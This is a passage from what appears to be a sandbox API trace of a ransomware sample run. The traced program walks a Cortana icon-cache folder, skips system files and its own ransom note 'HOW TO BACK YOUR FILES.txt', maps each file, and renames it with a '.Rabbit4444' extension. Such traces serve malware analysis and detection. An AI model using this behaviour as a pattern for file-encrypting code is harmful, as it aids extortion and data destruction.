(lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2="boot") returned -1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2="ids.txt") returned -1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2="NTUSER.DAT") returned -1 [0067.816] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}" | out: lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}") returned="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}" [0067.816] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", dwFileAttributes=0x0) returned 1 [0067.816] lstrlenW (lpString="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}") returned 38 [0067.816] lstrlenW (lpString="Rabbit4444") returned 10 [0067.816] lstrcmpiW (lpString1="C437A0419}", lpString2="Rabbit4444") returned -1 [0067.816] lstrlenW (lpString=".dll") returned 4 [0067.816] lstrcmpiW (lpString1="419}", lpString2=".dll") returned 1 [0067.816] lstrlenW (lpString=".lnk") returned 4 [0067.816] lstrcmpiW (lpString1="419}", lpString2=".lnk") returned 1 [0067.816] lstrlenW (lpString=".ini") returned 4 [0067.816] lstrcmpiW (lpString1="419}", lpString2=".ini") returned 1 [0067.816] lstrlenW (lpString=".sys") returned 4 [0067.816] lstrcmpiW (lpString1="419}", lpString2=".sys") returned 1 [0067.816] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{27F05FEC-A9C6-4C1E-B218-39AC437A0419}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{27f05fec-a9c6-4c1e-b218-39ac437a0419}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.817] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.817] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15912752002) returned 1 [0067.817] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0067.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0067.817] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.818] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.819] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.819] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.819] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.819] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.819] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15913008654) returned 1 [0067.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0067.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0067.819] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.820] CloseHandle (hObject=0x29c) returned 1 [0067.820] CloseHandle (hObject=0x280) returned 1 [0067.820] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{27F05FEC-A9C6-4C1E-B218-39AC437A0419}.Rabbit4444") returned 156 [0067.820] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{27F05FEC-A9C6-4C1E-B218-39AC437A0419}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{27f05fec-a9c6-4c1e-b218-39ac437a0419}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{27F05FEC-A9C6-4C1E-B218-39AC437A0419}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{27f05fec-a9c6-4c1e-b218-39ac437a0419}.rabbit4444"), dwFlags=0x1) returned 1 [0067.820] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98965b15, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98965b15, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x40518d21, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", cAlternateFileName="{2ADB8~1")) returned 1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2="Rabbit4444.exe") returned -1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2=".") returned 1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2="..") returned 1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2="windows") returned -1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2="bootmgr") returned -1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2="pagefile.sys") returned -1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2="boot") returned -1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2="ids.txt") returned -1 [0067.821] lstrcmpiW (lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}", lpString2="NTUSER.DAT") returned -1 [0067.821] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{2ADB8C14-DCB4-40AE-8D64-88007C912021}" | out: lpString1="{2ADB8C14-DCB4-40AE-8D64-88007C912021}") returned="{2ADB8C14-DCB4-40AE-8D64-88007C912021}" [0067.821] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2ADB8C14-DCB4-40AE-8D64-88007C912021}", dwFileAttributes=0x0) returned 1 [0067.822] lstrlenW (lpString="{2ADB8C14-DCB4-40AE-8D64-88007C912021}") returned 38 [0067.822] lstrlenW (lpString="Rabbit4444") returned 10 [0067.822] lstrcmpiW (lpString1="07C912021}", lpString2="Rabbit4444") returned -1 [0067.822] lstrlenW (lpString=".dll") returned 4 [0067.822] lstrcmpiW (lpString1="021}", lpString2=".dll") returned 1 [0067.822] lstrlenW (lpString=".lnk") returned 4 [0067.822] lstrcmpiW (lpString1="021}", lpString2=".lnk") returned 1 [0067.822] lstrlenW (lpString=".ini") returned 4 [0067.822] lstrcmpiW (lpString1="021}", lpString2=".ini") returned 1 [0067.822] lstrlenW (lpString=".sys") returned 4 [0067.822] lstrcmpiW (lpString1="021}", lpString2=".sys") returned 1 [0067.822] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2ADB8C14-DCB4-40AE-8D64-88007C912021}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2adb8c14-dcb4-40ae-8d64-88007c912021}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.823] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.823] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15913336070) returned 1 [0067.823] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0067.823] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.825] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0067.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0067.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.826] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15913675539) returned 1 [0067.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0067.826] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.826] CloseHandle (hObject=0x29c) returned 1 [0067.826] CloseHandle (hObject=0x280) returned 1 [0067.826] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2ADB8C14-DCB4-40AE-8D64-88007C912021}.Rabbit4444") returned 156 [0067.827] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2ADB8C14-DCB4-40AE-8D64-88007C912021}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2adb8c14-dcb4-40ae-8d64-88007c912021}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2ADB8C14-DCB4-40AE-8D64-88007C912021}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2adb8c14-dcb4-40ae-8d64-88007c912021}.rabbit4444"), dwFlags=0x1) returned 1 [0067.827] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee4fb205, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xee4fb205, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x40518d21, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{2BC99385-EF59-444C-A32A-68291A8E5017}", cAlternateFileName="{2BC99~1")) returned 1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2="Rabbit4444.exe") returned -1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2=".") returned 1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2="..") returned 1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2="windows") returned -1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2="bootmgr") returned -1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2="pagefile.sys") returned -1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2="boot") returned -1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2="ids.txt") returned -1 [0067.827] lstrcmpiW (lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}", lpString2="NTUSER.DAT") returned -1 [0067.827] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{2BC99385-EF59-444C-A32A-68291A8E5017}" | out: lpString1="{2BC99385-EF59-444C-A32A-68291A8E5017}") returned="{2BC99385-EF59-444C-A32A-68291A8E5017}" [0067.828] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2BC99385-EF59-444C-A32A-68291A8E5017}", dwFileAttributes=0x0) returned 1 [0067.828] lstrlenW (lpString="{2BC99385-EF59-444C-A32A-68291A8E5017}") returned 38 [0067.828] lstrlenW (lpString="Rabbit4444") returned 10 [0067.828] lstrcmpiW (lpString1="91A8E5017}", lpString2="Rabbit4444") returned -1 [0067.828] lstrlenW (lpString=".dll") returned 4 [0067.828] lstrcmpiW (lpString1="017}", lpString2=".dll") returned 1 [0067.828] lstrlenW (lpString=".lnk") returned 4 [0067.828] lstrcmpiW (lpString1="017}", lpString2=".lnk") returned 1 [0067.829] lstrlenW (lpString=".ini") returned 4 [0067.829] lstrcmpiW (lpString1="017}", lpString2=".ini") returned 1 [0067.829] lstrlenW (lpString=".sys") returned 4 [0067.829] lstrcmpiW (lpString1="017}", lpString2=".sys") returned 1 [0067.829] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2BC99385-EF59-444C-A32A-68291A8E5017}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2bc99385-ef59-444c-a32a-68291a8e5017}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.829] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.829] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15913976950) returned 1 [0067.829] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0067.829] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.830] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.832] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15914228751) returned 1 [0067.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0067.832] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.832] CloseHandle (hObject=0x29c) returned 1 [0067.832] CloseHandle (hObject=0x280) returned 1 [0067.832] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2BC99385-EF59-444C-A32A-68291A8E5017}.Rabbit4444") returned 156 [0067.832] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2BC99385-EF59-444C-A32A-68291A8E5017}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2bc99385-ef59-444c-a32a-68291a8e5017}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2BC99385-EF59-444C-A32A-68291A8E5017}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2bc99385-ef59-444c-a32a-68291a8e5017}.rabbit4444"), dwFlags=0x1) returned 1 [0067.833] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3817298a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3817298a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40518d21, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", cAlternateFileName="{2C933~1")) returned 1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2="Rabbit4444.exe") returned -1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2=".") returned 1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2="..") returned 1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2="windows") returned -1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2="bootmgr") returned -1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2="pagefile.sys") returned -1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2="boot") returned -1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2="ids.txt") returned -1 [0067.833] lstrcmpiW (lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", lpString2="NTUSER.DAT") returned -1 [0067.833] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}" | out: lpString1="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}") returned="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}" [0067.833] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}", dwFileAttributes=0x0) returned 1 [0067.834] lstrlenW (lpString="{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}") returned 38 [0067.834] lstrlenW (lpString="Rabbit4444") returned 10 [0067.834] lstrcmpiW (lpString1="96D4CDF2D}", lpString2="Rabbit4444") returned -1 [0067.834] lstrlenW (lpString=".dll") returned 4 [0067.834] lstrcmpiW (lpString1="F2D}", lpString2=".dll") returned 1 [0067.834] lstrlenW (lpString=".lnk") returned 4 [0067.834] lstrcmpiW (lpString1="F2D}", lpString2=".lnk") returned 1 [0067.834] lstrlenW (lpString=".ini") returned 4 [0067.834] lstrcmpiW (lpString1="F2D}", lpString2=".ini") returned 1 [0067.834] lstrlenW (lpString=".sys") returned 4 [0067.834] lstrcmpiW (lpString1="F2D}", lpString2=".sys") returned 1 [0067.834] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2c93380e-cac6-43b0-86b5-a8096d4cdf2d}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.834] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.834] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15914522821) returned 1 [0067.835] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0067.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0067.835] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.836] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.837] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15914806241) returned 1 [0067.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0067.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0067.837] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.838] CloseHandle (hObject=0x29c) returned 1 [0067.838] CloseHandle (hObject=0x280) returned 1 [0067.838] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}.Rabbit4444") returned 156 [0067.838] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2c93380e-cac6-43b0-86b5-a8096d4cdf2d}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{2C93380E-CAC6-43B0-86B5-A8096D4CDF2D}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{2c93380e-cac6-43b0-86b5-a8096d4cdf2d}.rabbit4444"), dwFlags=0x1) 